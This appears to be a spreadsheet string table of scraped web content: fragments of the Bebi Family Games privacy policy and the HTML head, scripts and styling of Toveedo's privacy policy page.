    <t>If you are unsure about whether our Services are compliant with your own country of residences&amp;rsquo; specific data protection and user privacy legislation you&amp;nbsp;should contact us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="bad3d4dcd5fad8dfd8d394dcdbd7d3d6c394"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;What information we collect&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Our primary purpose in collecting information is to provide you with a safe, efficient and customized experience and to provide you with Services and features that better meet your needs or requests.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We may collect personal and non-personal information from our users. The personal information is the one as defined above under the section &amp;ldquo;what is personal information&amp;rdquo;.</t>
  </si>
  <si>
    <t>We make sure we do not store your information for a longer period than necessary.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Legal basis of processing&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;When we collect, use, store or process, in any other way, your information, we rely on a number of legal bases, as set forth in this Privacy Policy:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Consent: we rely on your consent to store and use your personal information you provided to us. You may withdraw your consent at any time by contacting us at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="8ee7e0e8e1ceecebece7a0e8efe3e7e2f7a0"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; If you do not consent to the use of your personal data we may not be able to provide you with all or parts of our services.</t>
  </si>
  <si>
    <t>Before providing any information to any third-party website or service, we encourage you to review the privacy policy and other terms and conditions of that website or service. You agree that we will have no liability for any matters relating to a third-party website or service that you provide information to, including their collection and handling of that information.&lt;/p&gt;_x005F_x000D_
_ x000D_
&lt;p&gt;Data retention periods&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;We will not keep your personal or non-personal data for any longer than is necessary in light of the reason(s) for which it was first collected.&amp;nbsp;You can always request that we suspend or remove your personal data by writing to &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="0a63646c654a686f6863246c6b6763667324"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_</t>
  </si>
  <si>
    <t>The right to restrict (i.e. prevent) the processing of your personal data.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;e)&amp;nbsp;&amp;nbsp;The right to object to us for using your personal data for a particular purpose or purposes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;f)&amp;nbsp; &amp;nbsp;The right to withdraw consent.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;g)&amp;nbsp;&amp;nbsp;The right to&amp;nbsp;data portability.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;h)&amp;nbsp;&amp;nbsp;Rights relating to automated decision-making and profiling. We do not use your personal data in this way.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; For any right of yours in relation to your personal information, you can always contact us by writing to&amp;nbsp;&lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fd94939b92bd9f989f94d39b9c90949184"&gt;[email&amp;#160;protected]&lt;/a&gt;&amp;nbsp;to ask for more detailed information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any cause for complaint about our use of your personal data, you have the right to lodge a complaint with appropriate authorities.</t>
  </si>
  <si>
    <t>That said, we would welcome the opportunity to resolve your concerns ourselves, so please contact us first at &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="fe97909891be9c9b9c97d0989f93979287d0"&gt;[email&amp;#160;protected]&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Security Measures&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; We use industry-standard security measures at Bebi Family Games in order to secure your personal data. We also work with third-party service providers who possess high levels of security measures and provide relevant physical and technical safeguards to keep your personal data secure.&amp;nbsp;We use Secure Sockets Layer (SSL) software to encrypt the information you enter on our Apps and the Website in order to protect its security during transmission to and from our Apps or the Website.</t>
  </si>
  <si>
    <t>We are also required to get a consent from a parent or a legal guardian of the child below the age of 16 (in some member states of the EU) before they may use our Apps, in order to be compliant with the GDPR. We do not collect any personal information from children who cannot provide a valid consent according to the laws that apply to us. If a parent or a legal guardian of an underage child thinks that their child is using our Apps without their consent then they can contact us by writing at &lt;a href="/cdn-cgi/l/email-protection#fd94939b92bd9f989f94d39b9c90949184"&gt;&lt;span class="__cf_email__" data-cfemail="432a2d252c032126212a6d25222e2a2f3a"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;.</t>
  </si>
  <si>
    <t xml:space="preserve">We will immediately take actions, including removal of personal information relating to an underage child, subject to proof of identification to prevent any wrongful removal of information.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Parents of legal guardians of children have certain rights that they may exercise by directly getting in touch with us via our email address &lt;a href="/cdn-cgi/l/email-protection" class="__cf_email__" data-cfemail="731a1d151c331116111a5d15121e1a1f0a5d"&gt;[email&amp;#160;protected]&lt;/a&gt; These rights include:&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;ul&gt;_x005F_x000D_
	&lt;li&gt;Right to know what information we collect about children and how we process this data;&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Right to request removal or rectification of information relating to a child;&lt;/li&gt;_x005F_x000D_
	&lt;li&gt;Right to withdraw consent of the collection of personal data of a child.&lt;/li&gt;_x005F_x000D_
&lt;/ul&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Changes to our Privacy Policy&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt; This Privacy Policy may be updated from time to time for any reason. We will notify you of any changes to our Privacy Policy by posting the new Privacy Policy at:&lt;a href="https://www.google.com/url?q=https://bebi.family/privacy-policy/&amp;amp;sa=D&amp;amp;source=editors&amp;amp;ust=1630843964159000&amp;amp;usg=AOvVaw2I4fDXHTyuh2Z2WwpEXU2y"&gt;&amp;nbsp;&lt;/a&gt;https://privacy.bebi.family/&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Your continued use of the Apps and Services following the posting of changes will mean you accept those changes.&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;Contact us&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;p&gt;If you have any questions regarding privacy while using the Apps, or have questions about our practices, please contact us via email at &lt;a href="/cdn-cgi/l/email-protection#ddb4b3bbb29dbfb8bfb4f3bbbcb0b4b1a4"&gt;&lt;span class="__cf_email__" data-cfemail="365f585059765453545f1850575b5f5a4f"&gt;[email&amp;#160;protected]&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;_x005F_x000D_
_x005F_x000D_
&lt;/section&gt;_x005F_x000D_
_x005F_x000D_
    &lt;/main&gt;_x005F_x000D_
_x005F_x000D_
    &lt;footer class="footer mt-auto py-3"&gt;_x005F_x000D_
        &lt;div class="footer-content container"&gt;_x005F_x000D_
            &lt;div class="legal-links"&gt;_x005F_x000D_
                &lt;a href="/en/about/privacy-policy"&gt;Privacy Policy&lt;/a&gt;_x005F_x000D_
                &lt;a href="/en/about/terms-of-use"&gt;Terms of Use&lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="social-links"&gt;_x005F_x000D_
                &lt;a href="https://twitter.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/twitter.svg" alt="Bebi Family on Twitter" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.instagram.com/bebi.family" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/instagram.svg" alt="Bebi Family on Instagram" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
                &lt;a href="https://www.facebook.com/BebiFamily" target="_blank"&gt;_x005F_x000D_
                    &lt;img src="https://cdn.fndr.ge/images/bebi.family/icon/social/facebook.svg" alt="Bebi Family on Facebook" /&gt;_x005F_x000D_
                &lt;/a&gt;_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
            &lt;div class="copyright"&gt;_x005F_x000D_
                &amp;copy; 2019 - 2023 Bebi Family_x005F_x000D_
            &lt;/div&gt;_x005F_x000D_
        &lt;/div&gt;_x005F_x000D_
    &lt;/footer&gt;_x005F_x000D_
_x005F_x000D_
    &lt;script data-cfasync="false" src="/cdn-cgi/scripts/5c5dd728/cloudflare-static/email-decode.min.js"&gt;&lt;/script&gt;&lt;script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"&gt;&lt;/script&gt;_x005F_x000D_
    &lt;script src="/js/main.js?v=UTxhL3MyHpgL0N2td9gbE7FqpUe8S5sPMTWC6hSEXcE"&gt;&lt;/script&gt;_x005F_x000D_
    _x005F_x000D_
&lt;/body&gt;_x005F_x000D_
&lt;/html&gt;_x005F_x000D_
_x005F_x000D_
_x005F_x000D_
</t>
  </si>
  <si>
    <t>&lt;!doctype html&gt;
    &lt;!--[if lt IE 7]&gt;&lt;html class="no-js lt-ie9 lt-ie8 lt-ie7" lang="en"&gt; &lt;! [endif]--&gt;
    &lt;!--[if</t>
  </si>
  <si>
    <t>IE 7]&gt;&lt;html class="no-js lt-ie9 lt-ie8" lang="en"&gt; &lt;! [endif]--&gt;
    &lt;!--[if IE 8]&gt;&lt;html class="no-js lt-ie9" lang="en"&gt; &lt;!</t>
  </si>
  <si>
    <t>[endif]--&gt;
    &lt;!--[if IE 9 ]&gt;&lt;html class="ie9 no-js "&gt; &lt;![endif]--&gt;
    &lt;!--[if</t>
  </si>
  <si>
    <t>(gt IE 9)|!(IE)]&gt;&lt;!--&gt;&lt;html&gt; &lt;!--&lt;![endif]--&gt;
&lt;head&gt;
 &lt;meta charset="UTF-8" /&gt;
	  	&lt;meta name="viewport" content="width=device-width, initial-scale=1"&gt;
		&lt;meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /&gt;
		&lt;link rel="profile" href="https://gmpg.org/xfn/11" /&gt;
		&lt;link rel="apple-touch-icon" sizes="180x180" href="https://s3.amazonaws.com/unode1/assets/556/ZJg5PezeShid28REKrkH_apple-touch-icon.png"&gt;
		&lt;link rel="icon" type="image/png" sizes="32x32" href="https://s3.amazonaws.com/unode1/assets/556/6YXf1iSZOKBU27NieXtg_favicon-32x32.png"&gt;
		&lt;link rel="icon" type="image/png" sizes="16x16" href="https://s3.amazonaws.com/unode1/assets/556/JQ5GnpIaTQyJuONz39HC_favicon-16x16.png"&gt;
		&lt;link rel="manifest" href="https://s3.amazonaws.com/unode1/assets/556/rDcArYznT8a4NHzQNSYy_site.webmanifest"&gt;
		&lt;link rel="mask-icon" href="https://s3.amazonaws.com/unode1/assets/556/dQ4wKg5RZW8mDKlz3FD5_safari-pinned-tab.svg" color="#5bbad5"&gt;
		&lt;meta name="msapplication-TileColor" content="#ffffff"&gt;
		&lt;meta name="theme-color" content="#ffffff"&gt;
  &lt;title&gt;Privacy Policy | Toveedo&lt;/title&gt;
&lt;link rel="preconnect" href="https://alpha.uscreencdn.com"&gt;
  &lt;link rel="preconnect" href="https://assets-gke.uscreencdn.com"&gt;
&lt;link rel="preconnect" href=""&gt;
  &lt;link rel="stylesheet" href="https://assets-gke.uscreencdn.com/packs/css/storefront-styles-198e75e95bb17945c769.css" media="screen" /&gt;
  &lt;script src="https://assets-gke.uscreencdn.com/packs/js/storefront_hotwire-642535a3cc5f12c7623e.js" data-turbo-track="reload" defer="defer"&gt;&lt;/script&gt;
&lt;script src="https://assets-gke.uscreencdn.com/packs/js/storefront_analytics-0c8973d5e85a5f3a5835.js" data-turbo-track="reload" defer="defer"&gt;&lt;/script&gt;
&lt;script src="https://assets-gke.uscreencdn.com/packs/js/web-components-e72afc5897576daaf743.js" defer="defer"&gt;&lt;/script&gt;
&lt;script&gt;
//&lt;![CDATA [
window.gon={};gon.global={"uppy_companion_url":"https://uppy.uscreen.io/","assets_cdn_url":"https://alpha.uscreencdn.com","mixpanel_token":"44e8d04b49529b306bd4a1c79afcc56e"};gon.features_list=["login_limit","tailwind_latest","hotwire_catalog","new_user_dashboard","hotwire_gift_cards","apps_update_requests","zapier_and_webhooks","show_people_video_analytics","community_notifications_v1"];gon.feature_flags=["login_limit","tailwind_latest","hotwire_catalog","new_user_dashboard","hotwire_gift_cards","apps_update_requests","zapier_and_webhooks","show_people_video_analytics","community_notifications_v1"];gon.settings={"primary_color":"#41d0ffff","commenting":false,"my_library":false,"stats_id":"c43v645rpolt89529v2pesifn","analytics_env_id":"production","chapter_style":"thumbnails","store_title":"Toveedo","continue_watching":true,"mark_as_watched":false,"live_event_feed_link":null,"locale":"en","autoplay":true,"uplayer":true,"apps":{"show_popup":false,"icon_url":"https://alpha.uscreencdn.com/hybrid_apps/556/assets/icon.png","ios":{"url":"https://apps.apple.com/us/app/toveedo/id1245060220?uo=4","name":"Toveedo"},"android":{"url":"https://play.google.com/store/apps/details?id=tv.torahtreasure.android","name":"Toveedo"}},"show_notifications_center":false};gon.currency="USD";gon.locale="en";gon.stripe="pk_live_DImPqz7QOOyx70XCA9DSifxb";gon.recaptcha_v3_pub_key="6LenX-EZAAAAAAITxgGIXKB3S2OVKsM5r5tg0wKL";gon.store_id=556;gon.pixel_user=null;gon.pixel_store=556;gon.pixel_session="79e8f503-1074-4bf8-a217-8b544961eac4";gon.impersonated=null;gon.request_referer=null;gon.ga_id=null;gon.pixel_email=null;gon.environment="production";gon.analytics={"user_id":null,"store_id":556,"pixel_session":"79e8f503-1074-4bf8-a217-8b544961eac4","impersonated":null,"request_referer":null,"ga_id":null,"email":null,"environment":"production"};
//]]&gt;
&lt;/script&gt;
&lt;script&gt;
  var sentryDsn = 'https://a7a5d334e15546e5908bf92cc68c8833@o282387.ingest.sentry.io/5277605'
  var sentryStorefrontActive = true
  var sentryStorefrontSampleRate = 1.0
  var railsEnv = ''
  var analyticsHost = 'https://stats.uscreen.io'
  var analyticsConfig = null
  var storeId = 556
  var themeTitle = 'Orion'
&lt;/script&gt;
 &lt;script src="https://unpkg.com/axios/dist/axios.min.js"&gt;&lt;/script&gt;
&lt;style&gt;
  #profile_form .mb-5</t>
  </si>
  <si>
    <t>+ .mb-5 + .mb-5,
    form[data-test="form-customer-info"] .mb-6.flex.flex-col + div &gt; .mb-6.flex.flex-col:nth-of-type(2) {
    display: none;
  }
&lt;/style&gt;
&lt;script&gt;
  let detectTemplateProfile = () =&gt; {
    if (location.href.includes('/account/profile')) {
      let tablist = document.querySelector('ul[role="tablist"]:not(.touched)')
      if (tablist) {
        let markup = `
        &lt;li class="text-center" role="presentation"&gt;
            &lt;a href="https://toveedo.com/pages/block-videos" style="margin-bottom: -1px" class="
            block
            font-medium
            leading-tight
            py-5
            cursor-pointer
            mr-8
            text-gray-500 dark:text-gray-600
          " role="tab"&gt;
          Video Filters
        &lt;/a&gt;
        &lt;/li&gt;
        `
        tablist.insertAdjacentHTML('beforeEnd', markup)
        tablist.classList.add('touched')
      }
    }
    setTimeout(() =&gt; detectTemplateProfile(), 500)
  }
detectTemplateProfile()
&lt;/script&gt;
  &lt;!--</t>
  </si>
  <si>
    <t>Redirect Commnuity Page to Catalog --&gt;
  &lt;script&gt;   if (window.location.href.indexOf("community") &gt; -1) {  
  window.location.href="/catalog";  
  }  
&lt;/script&gt;
&lt;!-- Google Analytics --&gt;
&lt;script&gt;
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
    (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
    m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-28003562-3', 'auto');
  ga('send', 'pageview');
  ga('clientTracker.send', 'pageview');
&lt;/script&gt;
&lt;!--</t>
  </si>
  <si>
    <t>End Google Analytics --&gt;
&lt;link rel="stylesheet" href="https://assets-gke.uscreencdn.com/packs/css/tailwind-styles-37e21eec6a068488475b.css" media="screen" /&gt;
&lt;link rel="stylesheet" href="https://assets-gke.uscreencdn.com/packs/css/storefront-styles-198e75e95bb17945c769.css" media="screen" /&gt;
  &lt;link rel="shortcut icon" href="https://toveedo.com/images/favicontypes/662/lxdyMwvwS1SREjfy94nq_t.png"&gt;
      &lt;script type="text/javascript"&gt;
      (function(e,a,d,c,h){function f(k){if("undefined"!==typeof d&amp;&amp;d.sendBeacon){var b=a.gon;b={gid:e.cookie.split("; ").find(function(l){return l.startsWith("_gid=")}),current_pathname: a.location.pathname,current_query:a.location.search,current_host:a.location.host,window_height:a.innerHeight,window_width:a.innerWidth,real_referrer:e.referrer,current_store:b&amp;&amp;b.pixel_store,current_user:b&amp;&amp;b.pixel_user,current_email:b&amp;&amp;b.pixel_email,session:b&amp;&amp;b.pixel_session};d.sendBeacon(h,JSON.stringify(Object.assign({},b,k)))}}var g=a[c]=a[c]||
        [];a[c].push=f;for(c=0;c&lt;g.length;c++)f(g[c])})(document,window,navigator,"pix","https://pxl.uscreencdn.com/view");
    &lt;/script&gt;
&lt;style&gt;
  :root {
    --primary: #41d0ffff;
    --primary-rgb: 65, 208, 255;
    --contrast-text-color: #FFFFFF;
  }
  @media (min-width: 1024px) {
    .lg\:hidden {
      display: none !important;
    }
    .lg\:h-auto {
      height: auto !important;
    }
  }
  header .w-full {
    width: auto !important;
  }
  header .absolute {
    position: inherit !important;
  }
  .main-menu .absolute {
    position: absolute !important;
  }
  header svg {
    display: initial !important;
  }
  .header</t>
  </si>
  <si>
    <t>svg {
    display: initial !important;
  }
  /* fix Safari buttons issue for Alo theme */
  body[class^="tmp-"] [type=button],
  body[class^="tmp-"] [type=reset],
  body[class^="tmp-"]</t>
  </si>
  <si>
    <t>[type=submit],
  body[class^="tmp-"] button {
      -webkit-appearance: initial;
  }
  /* for old themes  */
  .display-none-important {
      display: none ! important;
  }
  .gallery-other {
    background-color: rgba(0, 0, 0, 0.5);
  }
  .gallery-grid-1 {
    grid-template-columns: 1fr 1fr;
  }
  .gallery-grid-2 {
    grid-template-columns: 1fr 30%;
  }
  .gallery-grid-3 {
    grid-template-columns: 1fr 23%;
  }
  .gallery-cover-image {
    left: 50%;
    transform: translateX(-50%);
  }
  .gallery-wrap {
    height: 14.55rem;
  }
  @media screen and (min-width: 650px) {
    .gallery-wrap {
      height: 19.75rem;
    }
  }
&lt;/style&gt;
    &lt;title&gt;Privacy Policy | Toveedo&lt;/title&gt;
    &lt;meta name="description" content="Toveedo Privacy Policy This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your informa..."&gt;
    &lt;!-- Schema.org markup for Google+ --&gt;
    &lt;meta itemprop="name" content="Privacy Policy"&gt;
    &lt;meta itemprop="description" content="Toveedo Privacy Policy This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your informa..."&gt;
    &lt;meta itemprop="image" content="https://alpha.uscreencdn.com/198xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp"&gt;
    &lt;!-- Twitter Card data --&gt;
    &lt;meta name="twitter:card" content="summary" /&gt;
    &lt;meta name="twitter:title" content="Privacy Policy" /&gt;
    &lt;meta name="twitter:description" content="Toveedo Privacy Policy This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your informa..." /&gt;
    &lt;meta name="twitter:image" content="https://alpha.uscreencdn.com/198xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp" /&gt;
    &lt;!--</t>
  </si>
  <si>
    <t>Open Graph data --&gt;
    &lt;meta property="og:title" content="Privacy Policy" &gt;
    &lt;meta property="og:type" content="article" /&gt;
    &lt;meta property="og:url" content="https://toveedo.com" &gt;
    &lt;meta property="og:image:url" content="https://alpha.uscreencdn.com/198xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp" &gt;
    &lt;meta property="og:description" content="Toveedo Privacy Policy This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your informa..." &gt;
    &lt;link rel="canonical" href="https://toveedo.com/pages/privacy-policy" /&gt;
    &lt;script type="application/ld+json"&gt;
      {
          "@context": "http://schema.org",
          "@type": "WebPage",
          "name": "Privacy Policy",
          "description": "Toveedo Privacy Policy This privacy policy is intended to inform you about the information and data gathered by Torah Treasure (“us”, “we”) when you use this service, how we store your informa...",
          "publisher": {
              "@type": "Organization",
              "name": "Toveedo"
          }
      }
      &lt;/script&gt;
&lt;!--Facebook Pixel Code--&gt;&lt;script&gt;!function(f,b,e,v,n,t,s) {if(f.fbq)return;n=f.fbq=function(){n.callMethod?n.callMethod.apply(n,arguments):n.queue.push(arguments)};if(!f._fbq)f._fbq=n;n.push=n;n.loaded=!0;n.version='2.0';n.queue=[];t=b.createElement(e);t.async=!0;t.src=v;s=b.getElementsByTagName(e)[0];s.parentNode.insertBefore(t,s)}(window,document,'script','https://connect.facebook.net/en_US/fbevents.js');fbq('init','628633714435515');fbq('track','PageView');&lt;/script&gt;&lt;noscript&gt;&lt;img height="1"width="1"style="display:none" src="https://www.facebook.com/tr?id=628633714435515&amp;ev=PageView&amp;noscript=1" /&gt;&lt;/noscript&gt;&lt;!--End Facebook Pixel Code--&gt;
  &lt;link href="https://assets-gke.uscreencdn.com/theme_assets/556/film.css?v=1681010367" rel="stylesheet" type="text/css"&gt;
  &lt;link href="https://assets-gke.uscreencdn.com/theme_assets/556/animations.css?v=1681010367" rel="stylesheet" type="text/css"&gt;
  &lt;link href="https://assets-gke.uscreencdn.com/theme_assets/556/styles.css?v=1681010367" rel="stylesheet" type="text/css"&gt;
  &lt;script type="text/javascript" src="//ajax.googleapis.com/ajax/libs/jquery/3.1.0/jquery.min.js"&gt;&lt;/script&gt;
  &lt;script src="https://assets-gke.uscreencdn.com/theme_assets/556/film.js?v=1681010367" async&gt;&lt;/script&gt;
  &lt;script src="https://assets-gke.uscreencdn.com/theme_assets/556/css3-animate-it.js?v=1681010367" async&gt;&lt;/script&gt;
&lt;/head&gt;
&lt;body&gt;
  &lt;style&gt;
    .header .top_menu .top_menu--link,
    .header .top_menu .top_menu--link:hover,
    .header .top_menu .dropdown--head-link,
    .header .top_menu .dropdown--head-link:hover,
    .top_menu .container a,
    .top_menu .container</t>
  </si>
  <si>
    <t>a:hover,
    .top_menu .container .dropdown--body a,
    .top_menu .container .dropdown--body a:hover {
      color: #FFFFFF;
    }
    .hero_banner .top_menu .container a.mobile_menu--link,
    .hero_banner</t>
  </si>
  <si>
    <t>.top_menu .container a.mobile_menu--link:hover {
      color: #FFFFFF;
    }
    .top_menu .container .mobile_menu--link,
    .dropdown--body,
    .dropdown--body a {
      border-color: #FFFFFF;
    }
    .header .dropdown, .header .fas, .header .top_menu--link {
      color: #FFFFFF;
    }
    .header .top_menu .dropdown--action svg&gt;g&gt;g {
      fill: #FFFFFF;
    }
    .top_menu</t>
  </si>
  <si>
    <t>.container .mobile_menu--link,
    .top_menu .container .mobile_menu--exit,
    .top_menu .container .mobile_menu--exit .far,
    .dropdown--body {
      background-color: #41d0ff;
    }
    .header {
      background-color: #41d0ff;
    }
    a,
    .top_menu .container</t>
  </si>
  <si>
    <t>.mobile_menu--link a,
    .top_menu .container .mobile_menu--link a:hover,
    .top_menu .container .mobile_menu--link a:focus,
    .top_menu .container</t>
  </si>
  <si>
    <t>.mobile_menu--link,
    .top_menu .container .mobile_menu--link:hover {
      color: #FFFFFF;
    }
    .top_menu .container .mobile_menu--link a svg&gt;g&gt;g {
      fill: #FFFFFF;
    }
    html, body {
      background-color: #FFFFFF;
    }
    .program--category-link {
      background: #FF00FF;
    }
    .btn--light:hover {
      background-color: #FF00FF;
    }
    .cce--upgrade-button, .btn--primary, .btn--outline {
      background: #FF00FF;
    }
    .primary-hover-color:hover {
      color: #FF00FF !important;
    }
    .author--profile {
      border-color: #FF00FF;
      color: #FF00FF;
    }
    .tabs .tab.active</t>
  </si>
  <si>
    <t>{
      color: #FF00FF;
    }
    .tabs .tab.active svg &gt; g &gt; g {
      fill: #FF00FF;
    }
    .testimonial</t>
  </si>
  <si>
    <t>svg #theme-1 {
      fill: #FF00FF;
    }
    .categories-home-page--block h3 {
      color: ;
    }
    .coming-soon--block h3 {
      color: ;
    }
    .cce--document-chapter.cce--video-active .cce --document-icon svg,
    .cce--document-chapter.cce--video-active .cce--video-icon svg,
    .cce--document-chapter:hover .cce--document-icon svg,
    .cce--document-chapter:hover .cce--video-icon svg,
    .cce--video-chapter.cce--video-active .cce--document-icon svg,
    .cce--video-chapter.cce--video-active .cce--video-icon svg,
    .cce--video-chapter:hover .cce--document-icon svg,
    .cce--video-chapter:hover .cce--video-icon svg {
      fill: #FF00FF !important;
    }
    .cce .vjs-volume-panel .vjs-volume-level,
    .cce</t>
  </si>
  <si>
    <t>.vjs-play-progress {
      background-color: rgba(255, 0, 255, 0.8) ! important;
    }
    .cce .vjs-load-progress {
      background-color: rgba(255, 0, 255, 0.2) ! important;
    }
  &lt;/style&gt;
    &lt;div class="header"&gt;
  &lt;div class="top_menu"&gt;
  &lt;div class="container"&gt;
    &lt;div class="top_menu--logo"&gt;
      &lt;a href="/"&gt;
          &lt;img
            src="https://alpha.uscreencdn.com/99xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp"
            data-full="https://alpha.uscreencdn.com/198xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp"
            srcset="https://alpha.uscreencdn.com/198xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp,
                https://alpha.uscreencdn.com/396xnull/556/uploads/6f544fb4-eb36-4c12-9811-9a0417415f60.png?auto=webp 2x"
            data-controller="progressive"
            data-target="progressive.image"
            class="image preview"
            alt="Toveedo"
            height="39px" style="height: 39px"/&gt;
      &lt;/a&gt;
    &lt;/div&gt;
    &lt;div class="d-inline-block d-md-none" data-controller="mobile-menu" style="margin-left: auto;"&gt;
  &lt;a class="top_menu--group py-2" data-action="mobile-menu#toggle"&gt;
    &lt;i class="fas fa-bars fa-2x"&gt;&lt;/i&gt;
  &lt;/a&gt;
  &lt;div class="d-inline-block d-md-none mobile_menu display-none-important" data-target="mobile-menu.content"&gt;
    &lt;a class="mobile_menu--link mobile_menu--exit py-2" data-action="mobile-menu#toggle" style="text-align: center;"&gt;
      &lt;i class="far fa-times-circle fa-2x"&gt;&lt;/i&gt;
    &lt;/a&gt;
            &lt;a href="https://toveedo.com/pages/testimonials" class="mobile_menu--link py-2"&gt;
              Testimonials
            &lt;/a&gt;
            &lt;a href="/gift_cards/new" class="mobile_menu--link py-2"&gt;
              Gift Card
            &lt;/a&gt;
            &lt;a href="/pages/faq" class="mobile_menu--link py-2"&gt;
              FAQ
            &lt;/a&gt;
            &lt;a href="/pages/coloring-pages" class="mobile_menu--link py-2"&gt;
              Activities 
            &lt;/a&gt;
            &lt;a href="/pages/free-month" class="mobile_menu--link py-2"&gt;
              FREE MONTH
            &lt;/a&gt;
        &lt;div class="dropdown" data-controller="dropdown"&gt;
          &lt;div class="mobile_menu--link"
                data-target="dropdown.selector"
                data-action="click-&gt;dropdown#toggle"&gt;
            &lt;a&gt;
              Videos
              &lt;svg width="10px" height="5px" viewBox="0 0 10 5" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"&gt;
                  &lt;g id="Page-1" stroke="none" stroke-width="1" fill="none" fill-rule="evenodd"&gt;
                      &lt;g id="catalogue-signed-in" transform="translate(-741.000000, -33.000000)" fill="rgba(255,255,255,.8)"&gt;
                          &lt;g id="header" transform="translate(0.000000, 21.000000)"&gt;
                              &lt;path d="M745.522616,15.8068583 L749.183027,12.1464466</t>
  </si>
  <si>
    <t>C749.378289,11.9511845 749.694872,11.9511845 749.890134,12.1464466 L749.898785,12.1550971</t>
  </si>
  <si>
    <t>C750.094047,12.3503592 750.094047,12.6669417 749.898785,12.8622039 L745.911138,16.8498501 C745.804608,16.9563806 745.661966,17.0047905</t>
  </si>
  <si>
    <t>745.522616,16.9950799 C745.383265,17.0047905 745.240623,16.9563806 745.134093,16.8498501 L741.146447,12.8622039 C740.951184,12.6669417 740.951184,12.3503592</t>
  </si>
  <si>
    <t>741.146447,12.1550971 L741.155097,12.1464466 C741.350359,11.9511845 741.666942,11.9511845 741.862204,12.1464466 L745.522616,15.8068583 Z" id="dropdown"&gt;&lt;/path&gt;
                          &lt;/g&gt;
                      &lt;/g&gt;
                  &lt;/g&gt;
              &lt;/svg&gt;
            &lt;/a&gt;
          &lt;/div&gt;
          &lt;div class="dropdown--body display-none-important" data-target="dropdown.content"&gt;
              &lt;a href="/catalog"&gt;All Videos&lt;/a&gt;
              &lt;a href="/pages/block-videos"&gt;Filter Videos&lt;/a&gt;
              &lt;a href="https://toveedo.com/programs/collection-qgh2k6qkoqi?categoryId=99304&amp;permalink=judge-judgement-5414be"&gt;12+&lt;/a&gt;
          &lt;/div&gt;
        &lt;/div&gt;
              &lt;a href="/sign_in" class="mobile_menu--link py-2"&gt;
                Sign</t>
  </si>
  <si>
    <t>In
              &lt;/a&gt;
  &lt;/div&gt;
&lt;/div&gt;
            &lt;a href="https://toveedo.com/pages/testimonials" class="top_menu--link py-2 d-none d-md-inline-block"&gt;
